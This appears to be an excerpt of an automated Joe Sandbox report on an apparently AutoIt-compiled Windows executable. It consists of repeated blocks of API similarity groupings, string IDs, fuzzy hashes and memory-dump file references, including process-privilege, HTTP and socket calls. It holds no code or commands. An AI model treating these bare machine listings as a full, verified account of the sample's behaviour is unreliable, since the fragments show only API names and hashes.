                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2573188126-1403004172
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2573188126-1403004172
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 2479661705-3771769585
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                      • String ID:
                                                                      • API String ID: 2672075419-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 685491774-0
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 0-1603158881
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Init$Clear
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                      • API String ID: 3467423407-1765764032
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                      • String ID: -----$SysListView32
                                                                      • API String ID: 2361508679-3975388722
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 2019164449-3381328864
                                                                      Similarity
                                                                      • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                      • String ID:
                                                                      • API String ID: 1903627254-0
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      Similarity
                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID: ?
                                                                      • API String ID: 500310315-1684325040
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 3721556410-2107944366
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 2$P
                                                                      • API String ID: 93392585-1110268094
                                                                      Similarity
                                                                      • API ID: Window$LongMessageSend$Show
                                                                      • String ID: '
                                                                      • API String ID: 257662517-1997036262
                                                                      Similarity
                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 4060274358-404129466
                                                                      • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                      • Instruction ID: 7b42bae9f2d935e61358697e50677872f8ec9e751cbcdd219dba8ecd6d46ba2e
                                                                      • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                      • Instruction Fuzzy Hash: 36217C21A8C79385FA54BF2AA90017AE361AF547E8FC84035DD4DC2395EF7DF88182E0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4051287042-3128320259
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 50796853-0
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Enabled
                                                                      • String ID:
                                                                      • API String ID: 3694350264-0
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                      • String ID:
                                                                      • API String ID: 3401586794-0
                                                                      Similarity
                                                                      • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 668425406-1075368562
                                                                      Similarity
                                                                      • API ID: LongMessageSendWindow
                                                                      • String ID:
                                                                      • API String ID: 3360111000-0
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID:
                                                                      • API String ID: 161812096-0
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      Similarity
                                                                      • API ID: AllocByteCharMultiStringWide
                                                                      • String ID:
                                                                      • API String ID: 3603722519-0
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                      • String ID:
                                                                      • API String ID: 3220332590-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: f$p
                                                                      • API String ID: 3215553584-1290815066
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      Similarity
                                                                      • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 564229958-0
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 0-2263619337
                                                                      Similarity
                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 2592858361-0
                                                                      Similarity
                                                                      • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                      • String ID:
                                                                      • API String ID: 383626216-0
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      Similarity
                                                                      • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2082702847-0
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1653399731-2785691316
                                                                      • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                      • Instruction ID: 80cc69458d962bcae086e799294db4e6ccab0c9ed8cf554ebbb85f083cb10b1a
                                                                      • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                      • Instruction Fuzzy Hash: 93B19F32B08B458AE710EF65D4401ADB7B0FB847A8F940136EE4D97B98DF38E545CB90
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7C0EEBF47), ref: 00007FF7C0EECE29
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 2358735015-567219261
                                                                      • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                      • Instruction ID: 28dce4f4fee95c77cee403bed3e60854ba157f0a49ff968e0bcf8cccc107fa54
                                                                      • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                      • Instruction Fuzzy Hash: 6D91D022B58A5A82EB24BF6584405B9A3A2BF147A0F944531DE2DD37D4DF3DF853C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                      • Instruction ID: 7dbc6f2817d8b0099b35e63a6e39592d03b36ab4d99cf0d6066cf588e79f81fd
                                                                      • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                      • Instruction Fuzzy Hash: B491AE26B48B4685EB10FF65E0402ADB369FB88BE8B854432DE5D93755DF38F845C3A0
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00007FF7C0EC0EDB
                                                                        • Part of subcall function 00007FF7C0EC0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7C0EC0F61), ref: 00007FF7C0EC0C6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharForegroundUpperWindow
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 3570115564-1994484594
                                                                      • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                      • Instruction ID: 9787e4e6724dc56ec1e4837bbfb4b1a652f0effabeb015c0225792731e46c8f2
                                                                      • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                      • Instruction Fuzzy Hash: 1071C222B8CA4281EE64BF64D4112B9E2A1AF55BA4FC44431CA0DC6391EF3EF58483E0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                      • Instruction ID: 47c6d24f3c4059ca833e7f4521ba5e6cfbbe246706d509a433815f0f528dadd2
                                                                      • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                      • Instruction Fuzzy Hash: 2A41C732F59A5341EB607F258448179E2D1ABA4BF4B940635CA5EC37D4EF3EF84283A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: #$E$O
                                                                      • API String ID: 3215553584-248080428
                                                                      • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                      • Instruction ID: b0e9ecfdb839fc3b649df9cd56f8ac3928e0ab018a38a4d4e697aa99a068cee7
                                                                      • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                      • Instruction Fuzzy Hash: AC41C032E59B9184EF51BF6998401A9A3A0BF54BA8F884231EE4D87798DF3DF441C360
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                      • String ID: \*.*
                                                                      • API String ID: 3196045410-1173974218
                                                                      • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                      • Instruction ID: 4444a4bde73243c5bb1e6750ebc95549b51b41e1d72ee999013141d904e30c2b
                                                                      • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                      • Instruction Fuzzy Hash: 71413122A4869395EB20FF24D8401FDA764FF95798FC40131DA4DD3B99EF29E509C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 787153527-1403004172
                                                                      • Opcode ID: 50f1d75fbf58418a8b746d3a4e6e520a523a5a635b2cd0adfcd1e093ce64af6b
                                                                      • Instruction ID: 7910d1cce8eb17c6685bec28ef9d96baeae43707be3125bf6fa75daebbb79115
                                                                      • Opcode Fuzzy Hash: 50f1d75fbf58418a8b746d3a4e6e520a523a5a635b2cd0adfcd1e093ce64af6b
                                                                      • Instruction Fuzzy Hash: BE31D122A4DA4286EA20FF11E4401B9E360FB85BA0FC44631DE4D87795DF3CF645C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                      • Instruction ID: 4f965eee0425c2c3c0cd05192dd76e5d63c016db45fcbc00fddec43cfcc4f05d
                                                                      • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                      • Instruction Fuzzy Hash: 9031C622A5C74242FB60BF11A414ABEA750FB84BA4F985131DE4D97B45DF3CE4428790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                      • Instruction ID: 0e4f6813c76824fde90897d7b294ba7f8b63b261c42c42af6ece49a2909c4cc8
                                                                      • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                      • Instruction Fuzzy Hash: 8931503260D781CAE761AF24E44476AB3A1FB85BA0F944135DA9987B94DF3CE484CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction ID: c30e02cafb01ea3d0a8f6deac139e67b710b03a1df72f7263d72ed753a11f55b
                                                                      • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction Fuzzy Hash: 55F04431A1EA4281EF45BF15E458279A3A1FF88BA4FC45035E90F86754DF7CE484C750
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                      • Instruction ID: 375e6776aa2ceeacdb92e16c6a900410c479ff944a7c743b59f08709aef78ca7
                                                                      • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
